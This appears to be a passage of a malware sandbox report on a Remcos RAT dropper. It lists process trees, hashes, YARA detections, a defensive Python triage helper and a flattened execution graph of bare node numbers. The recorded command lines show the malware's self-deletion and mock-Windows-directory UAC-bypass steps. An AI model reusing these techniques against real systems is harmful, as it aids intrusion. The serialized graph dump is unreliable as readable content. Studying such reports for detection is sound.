                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:02:24:11
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\xpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                          Imagebase:0xd10000
                                                                          File size:18'944 bytes
                                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 0%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:02:24:20
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:02:24:20
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:02:24:20
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\alpha.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                          Imagebase:0xb00000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:02:24:22
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\Libraries\Bzaszylr.PIF
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\Public\Libraries\Bzaszylr.PIF"
                                                                          Imagebase:0x400000
                                                                          File size:1'339'392 bytes
                                                                          MD5 hash:B4E2055B4877DCFCBF9A366106B15591
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:Borland Delphi
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 71%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:02:24:23
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\SndVol.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\SndVol.exe
                                                                          Imagebase:0x6d0000
                                                                          File size:226'712 bytes
                                                                          MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:02:24:30
                                                                          Start date:26/11/2024
                                                                          Path:C:\Users\Public\Libraries\Bzaszylr.PIF
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\Public\Libraries\Bzaszylr.PIF"
                                                                          Imagebase:0x400000
                                                                          File size:1'339'392 bytes
                                                                          MD5 hash:B4E2055B4877DCFCBF9A366106B15591
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:Borland Delphi
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:02:24:31
                                                                          Start date:26/11/2024
                                                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\System32\colorcpl.exe
                                                                          Imagebase:0x1b0000
                                                                          File size:86'528 bytes
                                                                          MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true
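The two process entries above show the pattern a responder should recognise without the sandbox verdict: the sample is re-executed from C:\Users\Public\Libraries under a .PIF extension (a renamed PE that Windows still runs), and one second later a 32-bit OS binary, colorcpl.exe, is started with no arguments and with the SysWOW64 image path rewritten to System32 on its command line, which is what a 32-bit parent sees through file system redirection. The following helper is an added example, not code from the Joe Sandbox report or from the malware it describes. It parses the Key:Value process blocks in the format shown above and applies those checks mechanically; the directory lists, extension list and check names are my own assumptions, not report fields, and the sample input is the two blocks above trimmed to the fields the checks read.

```python
"""Triage helper for Joe Sandbox 'Target ID' process blocks (added example)."""
import ntpath
import re

# Constructed input: Target 20 and 21 from the report, reduced to the fields used below.
SAMPLE_REPORT = r"""
Target ID:20
Path:C:\Users\Public\Libraries\Bzaszylr.PIF
Wow64 process (32bit):true
Commandline:"C:\Users\Public\Libraries\Bzaszylr.PIF"
MD5 hash:B4E2055B4877DCFCBF9A366106B15591
Has exited:true

Target ID:21
Path:C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\colorcpl.exe
MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
Has exited:true
"""

# Assumed lists (mine, not Joe Sandbox's): world-writable staging roots, extensions under
# which a renamed PE still executes via ShellExecute, and the OS binary directories.
WORLD_WRITABLE_ROOTS = ("c:\\users\\public\\", "c:\\programdata\\", "c:\\windows\\temp\\")
MISLEADING_PE_EXTENSIONS = {".pif", ".scr", ".com"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_processes(text):
    """Split report text into one dict per block; blocks are separated by blank lines.

    Only the first colon separates key from value, so drive letters survive intact.
    """
    processes, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                processes.append(current)
                current = {}
            continue
        key, sep, value = line.partition(":")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        processes.append(current)
    return processes


def has_no_arguments(commandline, image_ext):
    """True when the command line is only the image path (quoted or bare), nothing after it."""
    pattern = r'^"?(.*?' + re.escape(image_ext) + r')"?\s*(.*)$'
    match = re.match(pattern, commandline, re.IGNORECASE)
    return bool(match) and match.group(2) == ""


def triage(processes):
    """Return one {'tid', 'check', 'path'} finding per check that fires."""
    findings = []
    for proc in processes:
        tid = proc.get("Target ID", "?")
        path = proc.get("Path", "")
        commandline = proc.get("Commandline", "")
        low = path.lower()
        ext = ntpath.splitext(low)[1]  # ntpath handles backslashes on any host OS

        def hit(check):
            findings.append({"tid": tid, "check": check, "path": path})

        if low.startswith(WORLD_WRITABLE_ROOTS):       # 1. PE run from a staging directory
            hit("exec_from_public_dir")
        if ext in MISLEADING_PE_EXTENSIONS:             # 2. PE hiding behind a non-.exe suffix
            hit("pe_with_misleading_extension")
        if low.startswith(SYSTEM_DIRS):
            # 3. OS binary started with no arguments: a typical injection host, not user activity.
            if has_no_arguments(commandline, ext):
                hit("system_binary_no_args")
            # 4. Image in SysWOW64 but command line says System32: file system redirection,
            #    i.e. the parent that spawned it was itself a 32-bit (WoW64) process.
            if "\\syswow64\\" in low and "\\system32\\" in commandline.lower():
                hit("wow64_redirected_path")
    return findings


def ioc_hashes(processes, findings):
    """MD5s of every flagged image, sorted, for pivoting into EDR or other reports."""
    flagged = {f["tid"] for f in findings}
    return sorted({p["MD5 hash"] for p in processes
                   if p.get("Target ID") in flagged and "MD5 hash" in p})
```

Running `triage(parse_processes(SAMPLE_REPORT))` flags Target 20 for execution from C:\Users\Public and for the .PIF extension, and Target 21 for being an argument-less system binary whose path was redirected from System32 to SysWOW64; `ioc_hashes` then hands back both MD5s for a hunt. The checks are deliberately independent of the sandbox's own signatures so they also work on a bare process listing from an EDR.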


                                                                            Execution Graph

                                                                            Execution Coverage:18.6%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:3.5%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:21
                                                                            execution_graph: [call graph omitted; the export flattened the 2000-node graph into bare node numbers and edge pairs. Windows API functions that label nodes in the graph: CharNextA, CloseHandle, CreateProcessAsUserW, DispatchMessageA, ExitProcess, FlushInstructionCache, FreeLibrary, GetFileAttributesA, GetLocaleInfoA, GetMessageA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStdHandle, GetThreadLocale, InetIsOffline, LoadLibraryExA, LoadLibraryW, lstrcpynA, lstrlenA, MessageBoxA, NtClose, NtCreateFile, NtWriteFile, NtWriteVirtualMemory, QueryPerformanceCounter, RegCloseKey, RegOpenKeyExA, RegQueryValueExA, RtlDosPathNameToNtPathName_U, Sleep, SysAllocStringLen, SysFreeString, SysReAllocStringLen, timeSetEvent, TranslateMessage, VirtualAlloc, VirtualFree, WaitForSingleObject, WriteFile.]
2884530 11 API calls 35668->35670 35671 28a0f8b 35670->35671 38070 289e1d4 35671->38070 35675 28a2ad8 35677 2884860 11 API calls 35675->35677 35676 28a0f9d 35678 2884860 11 API calls 35676->35678 35679 28a2af9 35677->35679 35681 28a0fbe 35678->35681 35682 28a2b04 35679->35682 35684 28a0fc9 35681->35684 35686 28a2b11 35682->35686 35685 28a0fd6 35684->35685 35687 28847ec 11 API calls 35685->35687 35688 28847ec 11 API calls 35686->35688 35690 28a0ff5 35687->35690 35691 28a2b30 35688->35691 35693 28849a0 35690->35693 35699 28a2b3b 35691->35699 35695 28a1000 35693->35695 35698 28846d4 35695->35698 35701 28a100d 35698->35701 35702 28989d0 20 API calls 35699->35702 35704 28989d0 20 API calls 35701->35704 35705 28a2b54 35702->35705 35707 28a1019 35704->35707 35708 2884860 11 API calls 35705->35708 35710 2884860 11 API calls 35707->35710 35711 28a2b75 35708->35711 35713 28a103a 35710->35713 35715 28a2b80 35711->35715 35717 28a1045 35713->35717 35718 28a2b8d 35715->35718 35719 28a1052 35717->35719 35721 28847ec 11 API calls 35718->35721 35723 28847ec 11 API calls 35719->35723 35724 28a2bac 35721->35724 35726 28a1071 35723->35726 35729 28a2bb7 35724->35729 35728 28a107c 35726->35728 35731 28a1089 35728->35731 35736 28989d0 20 API calls 35729->35736 35735 28989d0 20 API calls 35731->35735 35739 28a1095 35735->35739 35737 28a2bd0 35736->35737 35740 2884860 11 API calls 35737->35740 35742 2884860 11 API calls 35739->35742 35743 28a2bf1 35740->35743 35745 28a10b6 35742->35745 35748 28846d4 35743->35748 35747 28a10c1 35745->35747 35753 28847ec 11 API calls 35747->35753 35749 28a2c09 35748->35749 35751 28847ec 11 API calls 35749->35751 35754 28a2c28 35751->35754 35756 28a10ed 35753->35756 35757 28a2c33 35754->35757 35759 28a10f8 35756->35759 35762 28a2c40 35757->35762 35760 28a1105 35759->35760 35764 28989d0 20 API calls 35760->35764 35765 28989d0 20 API calls 35762->35765 35767 28a1111 35764->35767 35768 28a2c4c 35765->35768 35771 2884860 11 API calls 35767->35771 35772 2884860 11 
API calls 35768->35772 35775 28a1132 35771->35775 35773 28a2c6d 35772->35773 35778 28a2c78 35773->35778 35777 28849a0 35775->35777 35780 28a113d 35777->35780 35781 28847ec 11 API calls 35778->35781 35782 28847ec 11 API calls 35780->35782 35783 28a2ca4 35781->35783 35785 28a1169 35782->35785 35788 28a2caf 35783->35788 35787 28849a0 35785->35787 35790 28a1174 35787->35790 35794 28989d0 20 API calls 35788->35794 35791 28a1181 35790->35791 35793 28989d0 20 API calls 35791->35793 35795 28a118d 35793->35795 35796 28a2cc8 35794->35796 35797 2884860 11 API calls 35795->35797 35796->35193 35800 28a2ced 35796->35800 35799 28a11ae 35797->35799 35804 28849a0 35799->35804 35802 2884860 11 API calls 35800->35802 35807 28a2d0e 35802->35807 35806 28a11b9 35804->35806 35809 28a2d26 35807->35809 35812 28847ec 11 API calls 35809->35812 35815 28a2d45 35812->35815 35819 28a2d50 35815->35819 35822 28a2d5d 35819->35822 35825 28989d0 20 API calls 35822->35825 35828 28a2d69 35825->35828 35831 2884860 11 API calls 35828->35831 37529 2882ef8 GetTickCount 37528->37529 37530 2882eed 37528->37530 37529->35120 37530->35120 37532 289f6fa GetProcAddress 37531->37532 37533 289f711 37531->37533 37534 289f709 37532->37534 37533->35192 37534->35192 37536 289f786 37535->37536 37537 289f760 GetProcAddress 37535->37537 37536->35193 37536->35197 37537->37536 37538 289f774 CheckRemoteDebuggerPresent 37537->37538 37538->37536 37540 28849a4 37539->37540 37540->35216 37548 289e114 37541->37548 37542 289e197 37543 28844dc 11 API calls 37542->37543 37544 289e19f 37543->37544 37546 2884530 11 API calls 37544->37546 37545 28849f8 11 API calls 37545->37548 37547 289e1aa 37546->37547 37549 2884500 11 API calls 37547->37549 37548->37542 37548->37545 37550 289e1c4 37549->37550 37550->35337 37552 28849a0 37551->37552 37553 2887e66 GetFileAttributesA 37552->37553 37554 2887e71 37553->37554 37554->35359 37554->35360 37556 28845cc 11 API calls 37555->37556 37557 288c38b 37556->37557 37557->35418 37559 2884de6 
37558->37559 37559->37559 38056 2884f20 SysAllocStringLen 38055->38056 38057 289dd85 38056->38057 38058 28844dc 11 API calls 38057->38058 38059 289dd9a 38058->38059 38060 289ddaa RtlDosPathNameToNtPathName_U 38059->38060 38218 289dbdc 38060->38218 38062 289ddc6 NtOpenFile NtQueryInformationFile 38063 2884bcc 11 API calls 38062->38063 38064 289de01 38063->38064 38065 28849f8 11 API calls 38064->38065 38066 289de0d NtReadFile NtClose 38065->38066 38067 289de37 38066->38067 38068 2884c60 SysFreeString 38067->38068 38069 289de3f 38068->38069 38069->35559 38071 289e1e6 38070->38071 38219 2888d94 38071->38219 38074 28844dc 11 API calls 38075 289e239 38074->38075 38075->35675 38075->35676 38218->38062 38220 2888da1 38219->38220 38221 2888dc7 38220->38221 38223 2887660 42 API calls 38220->38223 38221->38074 38223->38221 38225 28a7074 38226 2884860 11 API calls 38225->38226 38227 28a7095 38226->38227 38228 28847ec 11 API calls 38227->38228 38229 28a70cc 38228->38229 38230 28989d0 20 API calls 38229->38230 38231 28a70f0 38230->38231 38232 2884860 11 API calls 38231->38232 38233 28a7111 38232->38233 38234 28847ec 11 API calls 38233->38234 38235 28a7148 38234->38235 38236 28989d0 20 API calls 38235->38236 38237 28a716c 38236->38237 38238 2884860 11 API calls 38237->38238 38239 28a718d 38238->38239 38240 28847ec 11 API calls 38239->38240 38241 28a71c4 38240->38241 38242 28989d0 20 API calls 38241->38242 38243 28a71e8 38242->38243 38244 2884860 11 API calls 38243->38244 38245 28a7209 38244->38245 38246 28847ec 11 API calls 38245->38246 38247 28a7240 38246->38247 38248 28989d0 20 API calls 38247->38248 38249 28a7264 38248->38249 38250 2884860 11 API calls 38249->38250 38251 28a7285 38250->38251 38252 28847ec 11 API calls 38251->38252 38253 28a72bc 38252->38253 38254 28989d0 20 API calls 38253->38254 38255 28a72e0 38254->38255 38256 2884860 11 API calls 38255->38256 38257 28a731a 38256->38257 38258 289e0f8 11 API calls 38257->38258 38259 28a7349 38258->38259 39046 289f214 
38259->39046 38262 2884860 11 API calls 38263 28a7399 38262->38263 38264 28847ec 11 API calls 38263->38264 38265 28a73d0 38264->38265 38266 28989d0 20 API calls 38265->38266 38267 28a73f4 38266->38267 38268 2884860 11 API calls 38267->38268 38269 28a7415 38268->38269 38270 28847ec 11 API calls 38269->38270 38271 28a744c 38270->38271 38272 28989d0 20 API calls 38271->38272 38273 28a7470 38272->38273 38274 2884860 11 API calls 38273->38274 38275 28a7491 38274->38275 38276 28847ec 11 API calls 38275->38276 38277 28a74c8 38276->38277 38278 28989d0 20 API calls 38277->38278 38279 28a74ec 38278->38279 38280 2884860 11 API calls 38279->38280 38281 28a750d 38280->38281 38282 28847ec 11 API calls 38281->38282 38283 28a7544 38282->38283 38284 28989d0 20 API calls 38283->38284 38285 28a7568 38284->38285 38286 2884860 11 API calls 38285->38286 38287 28a7589 38286->38287 38288 28847ec 11 API calls 38287->38288 38289 28a75c0 38288->38289 38290 28989d0 20 API calls 38289->38290 38291 28a75e4 38290->38291 38292 2884860 11 API calls 38291->38292 38293 28a7605 38292->38293 38294 28847ec 11 API calls 38293->38294 38295 28a763c 38294->38295 38296 28989d0 20 API calls 38295->38296 38297 28a7660 38296->38297 38298 2884860 11 API calls 38297->38298 38299 28a7681 38298->38299 38300 28847ec 11 API calls 38299->38300 38301 28a76b8 38300->38301 38302 28989d0 20 API calls 38301->38302 38303 28a76dc 38302->38303 38304 2884860 11 API calls 38303->38304 38305 28a76fd 38304->38305 38306 28847ec 11 API calls 38305->38306 38307 28a7734 38306->38307 38308 28989d0 20 API calls 38307->38308 38309 28a7758 38308->38309 38310 2884860 11 API calls 38309->38310 38311 28a7779 38310->38311 38312 28847ec 11 API calls 38311->38312 38313 28a77b0 38312->38313 38314 28989d0 20 API calls 38313->38314 38315 28a77d4 38314->38315 38316 28a8318 38315->38316 38317 28a77e9 38315->38317 38319 2884860 11 API calls 38316->38319 38318 2884860 11 API calls 38317->38318 38320 28a780a 38318->38320 38321 28a8339 38319->38321 
38322 28847ec 11 API calls 38320->38322 38323 28847ec 11 API calls 38321->38323 38325 28a7841 38322->38325 38324 28a8370 38323->38324 38326 28989d0 20 API calls 38324->38326 38327 28989d0 20 API calls 38325->38327 38328 28a8394 38326->38328 38329 28a7865 38327->38329 38330 2884860 11 API calls 38328->38330 38331 2884860 11 API calls 38329->38331 38333 28a83b5 38330->38333 38332 28a7886 38331->38332 38334 28847ec 11 API calls 38332->38334 38335 28847ec 11 API calls 38333->38335 38336 28a78bd 38334->38336 38337 28a83ec 38335->38337 38339 28989d0 20 API calls 38336->38339 38338 28989d0 20 API calls 38337->38338 38340 28a8410 38338->38340 38341 28a78e1 38339->38341 38342 2884860 11 API calls 38340->38342 38343 2884860 11 API calls 38341->38343 38345 28a8431 38342->38345 38344 28a7902 38343->38344 38346 28847ec 11 API calls 38344->38346 38347 28847ec 11 API calls 38345->38347 38348 28a7939 38346->38348 38349 28a8468 38347->38349 38350 28989d0 20 API calls 38348->38350 38351 28989d0 20 API calls 38349->38351 38352 28a795d 38350->38352 38353 28a848c 38351->38353 38355 28847ec 11 API calls 38352->38355 38354 2884860 11 API calls 38353->38354 38357 28a84ad 38354->38357 38356 28a7975 38355->38356 38358 28985bc 18 API calls 38356->38358 38361 28847ec 11 API calls 38357->38361 38359 28a7986 38358->38359 38360 2884860 11 API calls 38359->38360 38362 28a79a7 38360->38362 38363 28a84e4 38361->38363 38364 28847ec 11 API calls 38362->38364 38365 28989d0 20 API calls 38363->38365 38369 28a79de 38364->38369 38366 28a8508 38365->38366 38367 28a851d 38366->38367 38368 28a93a1 38366->38368 38370 2884860 11 API calls 38367->38370 38371 2884860 11 API calls 38368->38371 38373 28989d0 20 API calls 38369->38373 38372 28a853e 38370->38372 38376 28a93c2 38371->38376 38377 28a8556 38372->38377 38374 28a7a02 38373->38374 38375 2884860 11 API calls 38374->38375 38380 28a7a23 38375->38380 38378 28847ec 11 API calls 38376->38378 38379 28847ec 11 API calls 38377->38379 38383 28a93f9 38378->38383 
38381 28a8575 38379->38381 38382 28847ec 11 API calls 38380->38382 38384 28a858d 38381->38384 38387 28a7a5a 38382->38387 38385 28989d0 20 API calls 38383->38385 38386 28989d0 20 API calls 38384->38386 38388 28a941d 38385->38388 38389 28a8599 38386->38389 38393 28989d0 20 API calls 38387->38393 38390 2884860 11 API calls 38388->38390 38391 2884860 11 API calls 38389->38391 38396 28a943e 38390->38396 38392 28a85ba 38391->38392 38397 28a85c5 38392->38397 38394 28a7a7e 38393->38394 38395 2884860 11 API calls 38394->38395 38400 28a7a9f 38395->38400 38398 28847ec 11 API calls 38396->38398 38399 28847ec 11 API calls 38397->38399 38403 28a9475 38398->38403 38401 28a85f1 38399->38401 38402 28847ec 11 API calls 38400->38402 38404 28a85fc 38401->38404 38407 28a7ad6 38402->38407 38405 28989d0 20 API calls 38403->38405 38406 28989d0 20 API calls 38404->38406 38408 28a9499 38405->38408 38409 28a8615 38406->38409 38412 28989d0 20 API calls 38407->38412 38410 2884860 11 API calls 38408->38410 38411 2884860 11 API calls 38409->38411 38414 28a94ba 38410->38414 38413 28a8636 38411->38413 38415 28a7afa 38412->38415 38416 28847ec 11 API calls 38413->38416 38417 28847ec 11 API calls 38414->38417 38418 289adf8 32 API calls 38415->38418 38422 28a866d 38416->38422 38421 28a94f1 38417->38421 38419 28a7b21 38418->38419 38420 2884860 11 API calls 38419->38420 38425 28a7b42 38420->38425 38423 28989d0 20 API calls 38421->38423 38424 28989d0 20 API calls 38422->38424 38434 28a9515 38423->38434 38426 28a8691 38424->38426 38428 28847ec 11 API calls 38425->38428 38427 28847ec 11 API calls 38426->38427 38429 28a86bd 38427->38429 38433 28a7b79 38428->38433 38432 28a86d5 38429->38432 38430 28a9cf5 38431 2884860 11 API calls 38430->38431 38436 28a9d16 38431->38436 38437 28a86e0 CreateProcessAsUserW 38432->38437 38438 28989d0 20 API calls 38433->38438 38434->38430 38435 2884860 11 API calls 38434->38435 38446 28a9560 38435->38446 38442 28847ec 11 API calls 38436->38442 38439 28a876e 38437->38439 38440 
28a86f2 38437->38440 38441 28a7b9d 38438->38441 38443 2884860 11 API calls 38439->38443 38444 2884860 11 API calls 38440->38444 38445 2884860 11 API calls 38441->38445 38451 28a9d4d 38442->38451 38452 28a878f 38443->38452 38447 28a8713 38444->38447 38450 28a7bbe 38445->38450 38448 28847ec 11 API calls 38446->38448 38449 28a871e 38447->38449 38457 28a9597 38448->38457 38456 28847ec 11 API calls 38449->38456 38453 28847ec 11 API calls 38450->38453 38454 28989d0 20 API calls 38451->38454 38455 28847ec 11 API calls 38452->38455 38463 28a7bf5 38453->38463 38458 28a9d71 38454->38458 38465 28a87c6 38455->38465 38459 28a874a 38456->38459 38461 28989d0 20 API calls 38457->38461 38460 2884860 11 API calls 38458->38460 38462 28a8755 38459->38462 38469 28a9d92 38460->38469 38464 28a95bb 38461->38464 38467 28989d0 20 API calls 38462->38467 38468 28989d0 20 API calls 38463->38468 38466 2884860 11 API calls 38464->38466 38470 28989d0 20 API calls 38465->38470 38476 28a95dc 38466->38476 38467->38439 38471 28a7c19 38468->38471 38473 28847ec 11 API calls 38469->38473 38472 28a87ea 38470->38472 38475 2884860 11 API calls 38471->38475 38474 2884860 11 API calls 38472->38474 38479 28a9dc9 38473->38479 38480 28a880b 38474->38480 38478 28a7c3a 38475->38478 38477 28847ec 11 API calls 38476->38477 38484 28a9613 38477->38484 38481 28847ec 11 API calls 38478->38481 38482 28989d0 20 API calls 38479->38482 38483 28847ec 11 API calls 38480->38483 38488 28a7c71 38481->38488 38485 28a9ded 38482->38485 38490 28a8842 38483->38490 38487 28989d0 20 API calls 38484->38487 38486 2884860 11 API calls 38485->38486 38493 28a9e0e 38486->38493 38489 28a9637 38487->38489 38492 28989d0 20 API calls 38488->38492 38491 2884860 11 API calls 38489->38491 38494 28989d0 20 API calls 38490->38494 38499 28a9658 38491->38499 38495 28a7c95 38492->38495 38497 28847ec 11 API calls 38493->38497 38496 28a8866 38494->38496 38501 2884860 11 API calls 38495->38501 38498 28849f8 11 API calls 38496->38498 38503 28a9e45 
38497->38503 38500 28a888a 38498->38500 38502 28847ec 11 API calls 38499->38502 38504 2884860 11 API calls 38500->38504 38505 28a7cd5 38501->38505 38508 28a968f 38502->38508 38506 28989d0 20 API calls 38503->38506 38507 28a88b9 38504->38507 38509 28847ec 11 API calls 38505->38509 38512 28a9e69 38506->38512 38513 28a88c4 38507->38513 38510 28989d0 20 API calls 38508->38510 38516 28a7d0c 38509->38516 38511 28a96b3 38510->38511 38514 289f094 11 API calls 38511->38514 38518 28989d0 20 API calls 38512->38518 38515 28847ec 11 API calls 38513->38515 38517 28a96ce 38514->38517 38519 28a88f0 38515->38519 38521 28989d0 20 API calls 38516->38521 38520 2884860 11 API calls 38517->38520 38524 28a9e9c 38518->38524 38525 28a88fb 38519->38525 38527 28a96f7 38520->38527 38522 28a7d30 38521->38522 38523 2884860 11 API calls 38522->38523 38532 28a7d51 38523->38532 38528 28989d0 20 API calls 38524->38528 38526 28989d0 20 API calls 38525->38526 38529 28a8914 38526->38529 38531 2884860 11 API calls 38527->38531 38534 28a9ecf 38528->38534 38530 2884860 11 API calls 38529->38530 38536 28a8935 38530->38536 38535 28a972f 38531->38535 38533 28847ec 11 API calls 38532->38533 38541 28a7d88 38533->38541 38537 28989d0 20 API calls 38534->38537 38538 28847ec 11 API calls 38535->38538 38540 28847ec 11 API calls 38536->38540 38539 28a9f02 38537->38539 38543 28a9766 38538->38543 38547 28989d0 20 API calls 38539->38547 38544 28a896c 38540->38544 38542 28989d0 20 API calls 38541->38542 38545 28a7dac 38542->38545 38548 28989d0 20 API calls 38543->38548 38550 28989d0 20 API calls 38544->38550 38546 2884860 11 API calls 38545->38546 38556 28a7dcd 38546->38556 38549 28a9f35 38547->38549 38551 28a978a 38548->38551 38552 2884860 11 API calls 38549->38552 38553 28a8990 38550->38553 38555 2884860 11 API calls 38551->38555 38557 28a9f56 38552->38557 38554 2884860 11 API calls 38553->38554 38560 28a89b1 38554->38560 38559 28a97ab 38555->38559 38558 28847ec 11 API calls 38556->38558 38561 28847ec 11 API calls 
